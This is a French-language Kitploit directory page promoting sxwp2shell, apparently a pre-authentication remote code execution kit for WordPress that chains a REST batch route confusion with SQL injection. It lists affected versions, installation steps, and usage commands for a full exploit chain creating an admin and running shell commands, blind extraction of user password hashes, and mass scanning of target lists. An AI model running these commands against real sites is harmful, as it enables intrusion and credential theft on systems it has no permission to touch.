Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sxwp2shell — Kit d'exploitation RCE pre-auth pour WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Outils/GitHubGitHub/sentinelxofficial/sxwp2shell
Frameworks de Tests d'IntrusionScanners de VulnérabilitésAnalyse de CodeExploitationSécurité Web
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

Kit d'exploitation RCE pre-auth pour WordPress wp2shell (CVE-2026-63030 + CVE-2026-60137)

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
root@kitploit:~
  / ___/___  ____  / /_(_)___  ___  / / | |/ /
  \__ \/ _ \/ __ \/ __/ / __ \/ _ \/ /  |   /
 ___/ /  __/ / / / /_/ / / / /  __/ /___/   |
/____/\___/_/ /_/\__/_/_/ /_/\___/_____/_/|_|

sxwp2shell — Exploit RCE sans authentification pour WordPress via une confusion de routes batch de l'API REST (CVE-2026-63030) + injection SQL (CVE-2026-60137).

Versions concernées : WP 6.9.0–6.9.4 / 7.0.0–7.0.1


Installation

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+, bibliothèque standard uniquement — aucune installation pip requise.

Utilisation

CommandeDescription
check <url>Détecte la version, l'endpoint batch, la confusion de routes et l'injection SQL
exploit <url>Chaîne RCE complète (SQLi → création d'admin → shell)
read <url>Extraction de données par injection SQL aveugle
scan <file>Analyse massive de cibles depuis un fichier, export CSV
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

Options

root@kitploit:~
--cmd CMD         Commande à exécuter          (défaut : id)
--query QUERY     Requête SQL personnalisée
-k, --insecure    Ignorer la vérification SSL
--proxy PROXY     Proxy HTTP
--timeout SEC     Délai d'expiration des requêtes              (défaut : 15)
--delay SEC       Délai entre les requêtes
--agent AGENT     User-Agent personnalisé
--no-color        Désactiver la sortie colorée
-o, --output      Enregistrer les résultats d'analyse en CSV

Avertissement

Pour tests de sécurité autorisés uniquement. Lisez DISCLAIMER.md.

Télécharger l’outil